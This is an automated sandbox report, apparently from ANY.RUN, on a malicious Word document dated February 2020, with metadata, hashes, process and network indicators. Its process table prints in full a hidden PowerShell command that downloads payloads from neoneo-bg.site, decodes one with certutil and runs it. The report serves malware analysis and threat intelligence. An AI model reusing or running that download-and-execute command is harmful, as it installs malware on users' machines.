File name: | lyft-d10197.doc |
Full analysis: | https://app.any.run/tasks/ac5e2dba-5343-4432-8a57-75bef9849e1b |
Verdict: | Malicious activity |
Analysis date: | February 21, 2020, 23:19:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: user, Template: Normal, Last Saved By: Windows User, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Feb 13 14:53:00 2020, Last Saved Time/Date: Thu Feb 13 14:55:00 2020, Number of Pages: 1, Number of Words: 39, Number of Characters: 225, Security: 0 |
MD5: | 4B5099C060D46F7131D68DE541C21032 |
SHA1: | CC22C43E2C4A00C1AAA22A47B95C0B242452625D |
SHA256: | 316F4B622A4ECB43456D8E988D062AFAB6A90CD53A13A63BD4C84ED97EDDA942 |
SSDEEP: | 3072:OeqY9kejd68AczcNMT+MMoPxbU32qSz6kn5lDl:Ldpq/w5l |
.doc | | | Microsoft Word document (38.3) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (29.3) |
.doc | | | Microsoft Word document (old ver.) (22.7) |
Title: | - |
---|---|
Subject: | - |
Author: | user |
Keywords: | - |
Comments: | - |
Template: | Normal |
LastModifiedBy: | Windows User |
RevisionNumber: | 4 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:02:13 14:53:00 |
ModifyDate: | 2020:02:13 14:55:00 |
Pages: | 1 |
Words: | 39 |
Characters: | 225 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | diakov.net |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 263 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\lyft-d10197.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3316 | powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1456 | "C:\Windows\system32\certutil.exe" -decode sfera po15p | C:\Windows\system32\certutil.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147942402 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B74.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1FT6OK300CYDZGL6RBXA.temp | — | |
MD5:— | SHA256:— | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa6769f.TMP | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2672B613CBF08CF3A38F3E7109100FC3 | SHA256:1A1402DF8C33B8149EB4FC581287D0A429EB5A85787BBE5BCC0EADAD67BB0E13 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ft-d10197.doc | pgc | |
MD5:015C728C45003995E512FAFBD54885F2 | SHA256:7406541EDF65E1942299575A81EF3B5E06C3B7C495DB4392EE3D42727BDC42D9 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 404 | 92.63.192.216:80 | http://neoneo-bg.site/hIeak.dat | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 92.63.192.216:80 | neoneo-bg.site | IT DeLuxe Ltd. | RU | malicious |
Domain | IP | Reputation |
---|---|---|
embaracedo.microsoft.com |
| unknown |
neoneo-bg.site |
| malicious |